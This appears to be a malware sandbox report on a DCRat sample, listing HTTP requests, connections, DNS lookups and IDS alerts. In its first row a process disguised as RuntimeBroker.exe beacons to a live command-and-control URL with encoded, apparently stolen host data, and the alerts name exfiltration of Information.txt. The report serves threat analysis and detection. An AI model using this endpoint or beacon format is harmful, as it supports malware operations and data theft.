2972 | RuntimeBroker.exe | GET | 200 | 185.176.43.100:80 | http://sigmabioaef.atwebpages.com/12884306.php?JA9TOLhMg23Nt=vZdicV3JZAzJjJ&E5Yw7RONjUIjg2wwh3P9l=LK8fAk8eEmYg&6eavHhL4OTvWQnN=QUKDsuNxcR&2ec73fa4edc1d49c853df1815b7014c2=5QzYjRDN4YjN5UzNyQWZjdjZkVWNkNDZ5IGN5YTYwUTZhZTM1IGZzITO1UDN0MzMyYDNwUjM&d730d9f9ce4aee48722b12e1fd23db7e=QOkZWOhJjZ4UjNjFWO5QTMmdjNwkDMwMWNwIGNyQzY0I2M2ImN5EmZ&8840cb222f57329aad528a7e4bfbb468=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 | unknown | — | — | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4712 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4300 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 2.23.227.215:443 | — | Ooredoo Q.S.C. | QA | unknown |
4300 | svchost.exe | 2.19.11.105:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted |
4712 | MoUsoCoreWorker.exe | 2.19.11.105:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted |
4712 | MoUsoCoreWorker.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted |
4300 | svchost.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted |
4712 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
sigmabioaef.atwebpages.com |
| malicious |
ipinfo.io |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2972 | RuntimeBroker.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
2972 | RuntimeBroker.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup SSL Cert Observed (ipinfo .io) |
2972 | RuntimeBroker.exe | Device Retrieving External IP Address Detected | ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io) |
2192 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io) |
— | — | Device Retrieving External IP Address Detected | ET INFO External IP Lookup ipinfo.io |
2972 | RuntimeBroker.exe | Misc activity | ET HUNTING Suspicious HTTP POST to Free Web Host Atwebpages |
2972 | RuntimeBroker.exe | A Network Trojan was detected | ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt) |